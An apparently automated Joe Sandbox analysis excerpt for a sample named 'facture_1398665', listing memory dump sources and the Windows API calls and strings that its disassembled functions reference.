    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • OleInitialize.OLE32(00000000), ref: 0047A859
    • LoadIconW.USER32(00400000,MAINICON), ref: 0047A944
      • Part of subcall function 004371D0: GetIconInfo.USER32(?,?), ref: 004371F1
      • Part of subcall function 004371D0: GetObjectW.GDI32(?,00000018,?), ref: 00437212
      • Part of subcall function 004371D0: DeleteObject.GDI32(?), ref: 0043723E
      • Part of subcall function 004371D0: DeleteObject.GDI32(?), ref: 00437247
    • GetModuleFileNameW.KERNEL32(00400000,?,00000100,?,?,?,00469730,00000000,00000000,?,?,00000000,004697AB), ref: 0047A988
    • CharNextW.USER32(?), ref: 0047A9CD
    • CharLowerW.USER32(00000000), ref: 0047A9D3
      • Part of subcall function 0047ABF0: GetClassInfoW.USER32(00400000,0047A80C,?), ref: 0047AC52
      • Part of subcall function 0047ABF0: RegisterClassW.USER32(00503DA4), ref: 0047AC6A
      • Part of subcall function 0047ABF0: SetWindowLongW.USER32(8840C01B,000000FC,56022444), ref: 0047AD0A
      • Part of subcall function 0047ABF0: SendMessageW.USER32(8840C01B,00000080,00000001,00000000), ref: 0047AD2F
      • Part of subcall function 0047ABF0: SetClassLongW.USER32(8840C01B,000000F2,00000000), ref: 0047AD45
      • Part of subcall function 0047ABF0: GetSystemMenu.USER32(8840C01B,00000000), ref: 0047AD53
      • Part of subcall function 0047ABF0: DeleteMenu.USER32(00000000,0000F030,00000000), ref: 0047AD62
      • Part of subcall function 0047ABF0: DeleteMenu.USER32(00000000,0000F000,00000000), ref: 0047AD6F
      • Part of subcall function 0047ABF0: DeleteMenu.USER32(00000000,0000F010,00000000), ref: 0047AD86
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
    • GetClassInfoW.USER32(?,?,?), ref: 0045FA4C
    • UnregisterClassW.USER32(?,?), ref: 0045FA77
    • RegisterClassW.USER32(?), ref: 0045FA96
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0045FAD2
    • GetWindowLongW.USER32(00000000,000000F4), ref: 0045FAE7
    • SetWindowLongW.USER32(00000000,000000F4,00000000), ref: 0045FAFA
      • Part of subcall function 00463DC8: IsIconic.USER32(?), ref: 00463DD7
      • Part of subcall function 00463DC8: GetWindowPlacement.USER32(?,?), ref: 00463DF4
      • Part of subcall function 00463DC8: GetWindowRect.USER32(?,?), ref: 00463E13
      • Part of subcall function 00463DC8: GetWindowLongW.USER32(?,000000F0), ref: 00463E21
      • Part of subcall function 00463DC8: GetWindowLongW.USER32(?,000000F8), ref: 00463E3A
      • Part of subcall function 00463DC8: GetWindowLongW.USER32(00000000,000000EC), ref: 00463E48
      • Part of subcall function 00463DC8: ScreenToClient.USER32(00000000), ref: 00463E78
      • Part of subcall function 00463DC8: ScreenToClient.USER32(00000000), ref: 00463E9D
      • Part of subcall function 00430D88: CreateFontIndirectW.GDI32(?), ref: 00430F23
      • Part of subcall function 004135BC: GetLastError.KERNEL32(0040AA79,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7), ref: 004135BC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SHGetFileInfoW.SHELL32(c:\directory,00000010,?,000002B4,00001010), ref: 004C458B
    • ExtractIconW.SHELL32(00400000,00000000,?), ref: 004C45B2
    • ExtractIconW.SHELL32(00400000,00000000,00000027), ref: 004C460B
    • SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00001000), ref: 004C466C
    • ExtractIconW.SHELL32(00400000,00000000,?), ref: 004C4693
      • Part of subcall function 004C4424: DrawIconEx.USER32(00000000,00000000,00000000,?,00000020,00000020,00000000,00000000,00000003), ref: 004C44BF
      • Part of subcall function 004C4424: DestroyCursor.USER32(?), ref: 004C44D5
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • PeekMessageW.USER32(?,00000000,00000200,0000020A,00000001), ref: 0047C284
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0047C29C
    • IsWindowUnicode.USER32 ref: 0047C2B0
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047C2D7
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0047C2ED
      • Part of subcall function 0047DF34: GetCapture.USER32 ref: 0047DF3E
      • Part of subcall function 0047DF34: GetParent.USER32(00000000), ref: 0047DF6C
      • Part of subcall function 0047BFCC: TranslateMDISysAccel.USER32(004B2FD1), ref: 0047C00B
      • Part of subcall function 0047C01C: GetCapture.USER32 ref: 0047C042
      • Part of subcall function 0047C01C: GetParent.USER32(00000000), ref: 0047C068
      • Part of subcall function 0047C01C: IsWindowUnicode.USER32(00000000), ref: 0047C085
      • Part of subcall function 0047C01C: SendMessageW.USER32(00000000,-0000BBEE,01484140,?), ref: 0047C0A0
      • Part of subcall function 0047C01C: SendMessageA.USER32(00000000,-0000BBEE,01484140,?), ref: 0047C0BF
      • Part of subcall function 0047C01C: GetWindowThreadProcessId.USER32(00000000), ref: 0047C0CE
      • Part of subcall function 0047C01C: GetWindowThreadProcessId.USER32(?,?), ref: 0047C0DF
      • Part of subcall function 0047C01C: SendMessageW.USER32(00000000,-0000BBEE,01484140,?), ref: 0047C0FF
      • Part of subcall function 0047BF84: IsWindowUnicode.USER32(00000000), ref: 0047BF98
      • Part of subcall function 0047BF84: IsDialogMessageW.USER32(?), ref: 0047BFA9
      • Part of subcall function 0047BF84: IsDialogMessageA.USER32(?,?,00000000,?,01484141,0047C373,?,?,?,?,01484140), ref: 0047BFBE
    • TranslateMessage.USER32 ref: 0047C378
    • DispatchMessageW.USER32 ref: 0047C385
    • DispatchMessageA.USER32 ref: 0047C38D
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
    • GetMenu.USER32(00000000), ref: 00474BA0
    • SetMenu.USER32(00000000,00000000), ref: 00474BBD
    • SetMenu.USER32(00000000,00000000), ref: 00474BF2
    • SetMenu.USER32(00000000,00000000), ref: 00474C0E
      • Part of subcall function 004749B4: GetMenu.USER32(00000000), ref: 004749FA
      • Part of subcall function 004749B4: SendMessageW.USER32(00000000,00000230,00000000,00000000), ref: 00474A12
      • Part of subcall function 004749B4: DrawMenuBar.USER32(00000000), ref: 00474A23
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00474C55
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047F714: GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,004AE66B,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000), ref: 0047F727
      • Part of subcall function 004AD01C: CreateProcessW.KERNEL32(00000000,00000000,?,?,?,004B3204,00000000,1K,?,?), ref: 004AD070
      • Part of subcall function 004AD01C: GetLastError.KERNEL32(00000000,004AD096,?,?,?,00000001), ref: 004AD078
    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,004AFC6C,004AFC6C,?,004AFC6C,00000000), ref: 004AFBF1
    • CloseHandle.KERNEL32(004FCF6D), ref: 004AFBFE
      • Part of subcall function 004AF9A8: WaitForInputIdle.USER32(00000001,00000032), ref: 004AF9D4
      • Part of subcall function 004AF9A8: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004AF9F6
      • Part of subcall function 004AF9A8: GetExitCodeProcess.KERNEL32(00000001,?), ref: 004AFA07
      • Part of subcall function 004AF9A8: CloseHandle.KERNEL32(00000001), ref: 004AFA27
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetKeyboardLayoutList.USER32(00000040,?), ref: 00479A0C
    • RegOpenKeyExW.ADVAPI32(80000002,00000000), ref: 00479A74
    • RegQueryValueExW.ADVAPI32(?,layout text,00000000,00000000,?,00000200,00000000,00479B1D,?,80000002,00000000), ref: 00479AAE
    • RegCloseKey.ADVAPI32(?,00479B24,00000000,?,00000200,00000000,00479B1D,?,80000002,00000000), ref: 00479B17
    Strings
    • layout text, xrefs: 00479AA5
    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00479A5E
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetActiveWindow.USER32 ref: 004814BB
    • GetFocus.USER32 ref: 004814C3
      • Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
      • Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
    • RegisterClassW.USER32(00503E00), ref: 004814E4
    • SetFocus.USER32(00000000), ref: 00481583
      • Part of subcall function 0040A124: CreateWindowExW.USER32(00000000,TWindowDisabler-Window,00000000,0048159E,?,?,?,00000001,00000000,?,W3K,?), ref: 0040A163
      • Part of subcall function 0047BEA4: GetWindowTextW.USER32(?,?,00000100), ref: 0047BED3
    • ShowWindow.USER32(00000000,00000008), ref: 0048157C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00500EBE,?,00000000,00000000,00000000), ref: 00500E22
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00500EBE,?,00000000,00000000,00000000), ref: 00500E3C
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
      • Part of subcall function 00413C38: SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
      • Part of subcall function 00413C38: LoadLibraryW.KERNEL32(00000000), ref: 00413C71
      • Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004C8E08: GetCursor.USER32 ref: 004C8EDF
      • Part of subcall function 004C8E08: LoadCursorW.USER32(00000000,00007F02), ref: 004C8EED
      • Part of subcall function 004C8E08: SetCursor.USER32(00000000), ref: 004C8EF3
      • Part of subcall function 004C8E08: Sleep.KERNEL32(000002EE,00000000,00000000,00007F02), ref: 004C8EFD
      • Part of subcall function 004C8E08: SetCursor.USER32(00000000), ref: 004C8F03
      • Part of subcall function 004E644C: GetForegroundWindow.USER32 ref: 004E6487
      • Part of subcall function 004E644C: SetActiveWindow.USER32(?), ref: 004E649E
      • Part of subcall function 004C7728: SetActiveWindow.USER32(?), ref: 004C7846
    • SetActiveWindow.USER32(?), ref: 004C997B
      • Part of subcall function 004C872C: GetSystemMenu.USER32(00000000,00000000), ref: 004C88AE
      • Part of subcall function 004C872C: EnableMenuItem.USER32(00000000,00000000,00000000), ref: 004C88B4
      • Part of subcall function 004E5EF8: SetActiveWindow.USER32(?), ref: 004E602B
      • Part of subcall function 004E5EF8: SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004E60CC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047BD0C: SetActiveWindow.USER32(?), ref: 0047BD2E
      • Part of subcall function 0047BD0C: ShowWindow.USER32(00000000,00000009), ref: 0047BD51
      • Part of subcall function 0047BD0C: IsWindowEnabled.USER32(00000000), ref: 0047BD73
      • Part of subcall function 0047BD0C: DefWindowProcW.USER32(?,00000112,0000F120,00000000), ref: 0047BD8F
      • Part of subcall function 0047BD0C: SetWindowPos.USER32(?,00000000,00000000,?,?,0047B69E,00000000), ref: 0047BDDB
      • Part of subcall function 0047BD0C: SetFocus.USER32(00000000), ref: 0047BE29
    • SetActiveWindow.USER32(?), ref: 004E602B
    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004E60CC
      • Part of subcall function 004B0CD4: SendMessageTimeoutW.USER32(0000FFFF,0000001A,00000000,Environment,00000002,00001388), ref: 004B0CEB
      • Part of subcall function 004E4640: PostMessageW.USER32(00000000,00000012,00000000,00000000), ref: 004E4648
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
      • Part of subcall function 004AD1B4: GetLastError.KERNEL32(00000000,004AD20A), ref: 004AD1EC
      • Part of subcall function 004ACFA4: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,004AD003), ref: 004ACFDD
      • Part of subcall function 004ACFA4: GetLastError.KERNEL32(00000000,00000000,00000000,004AD003), ref: 004ACFE5
    • GetLastError.KERNEL32(00000000,004CE619,?,0050BE1C,00000000,00000000,00000000,00000000,?,004CE98A,?,00000000,004CEAD4,?,?,0050BE1C), ref: 004CE4E9
      • Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    • SHChangeNotify.SHELL32(00000008,00000005,00000000,00000000), ref: 004CE567
    • SHChangeNotify.SHELL32(00001000,00001005,00000000,00000000), ref: 004CE58C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AE274: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AE369,?,00000000,0050B17C,00000003,00000000,00000000,?,004DE8D3,00000000,004DE9FE), ref: 004AE2BC
      • Part of subcall function 004AE274: GetLastError.KERNEL32(00000000,00000000,?,00000000,004AE369,?,00000000,0050B17C,00000003,00000000,00000000,?,004DE8D3,00000000,004DE9FE), ref: 004AE2C5
    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE937
    • GetLastError.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE940
      • Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00408F4C: GetModuleHandleW.KERNEL32(00000000,?,0050157F), ref: 00408F58
    • GetWindowLongW.USER32(?,000000EC), ref: 0050158F
    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005015A2
    • SetErrorMode.KERNEL32(00000001,00000000,005015E7), ref: 005015B7
      • Part of subcall function 004FE938: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000,005015E7), ref: 004FE942
      • Part of subcall function 0047C3E4: SendMessageW.USER32(?,0000B020,00000000,?), ref: 0047C409
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF6E
    • ShowWindow.USER32(?,00000005), ref: 00501621
      • Part of subcall function 0047C4DC: GetWindowLongW.USER32(?,000000EC), ref: 0047C5B8
      • Part of subcall function 0047C4DC: SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047C5C6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetWindowLongW.USER32(00000000,000000EC), ref: 0047892C
    • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0047895E
      • Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA
    • SetLayeredWindowAttributes.USER32(00000000,00000000,?,00000000), ref: 0047899C
    • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 004789B5
    • RedrawWindow.USER32(00000000,00000000,00000000,00000485), ref: 004789CB
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 004A4C39
      • Part of subcall function 00430D88: CreateFontIndirectW.GDI32(?), ref: 00430F23
    • SelectObject.GDI32(?,00000000), ref: 004A4C5C
      • Part of subcall function 004A494C: DrawTextW.USER32(?,00000000,00000000,?,?), ref: 004A4977
    • ReleaseDC.USER32(00000000,?), ref: 004A4C8F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 004373D6
      • Part of subcall function 0042E85C: RegCloseKey.ADVAPI32(10AC0000,0042E6D8,00000001,0042E7DA,?,?,0043740E,00000008,00000060,00000048,00000000,004374AE), ref: 0042E870
      • Part of subcall function 0042E8C0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E939
      • Part of subcall function 0042E8C0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E9A9
      • Part of subcall function 0042E8C0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?), ref: 0042EA14
      • Part of subcall function 0042E82C: RegFlushKey.ADVAPI32(00000000,?,0042E898,?,?,00000000,0042EA5B,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0042E83D
      • Part of subcall function 0042E82C: RegCloseKey.ADVAPI32(00000000,?,0042E898,?,?,00000000,0042EA5B,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0042E846
      • Part of subcall function 0043736C: GetDC.USER32(00000000), ref: 00437375
      • Part of subcall function 0043736C: SelectObject.GDI32(00000000,018A002E), ref: 00437387
      • Part of subcall function 0043736C: GetTextMetricsW.GDI32(00000000), ref: 00437392
      • Part of subcall function 0043736C: ReleaseDC.USER32(00000000,00000000), ref: 004373A3
    Strings
    • Tahoma, xrefs: 004373F8
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 0043742C
    • MS Shell Dlg 2, xrefs: 00437440
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
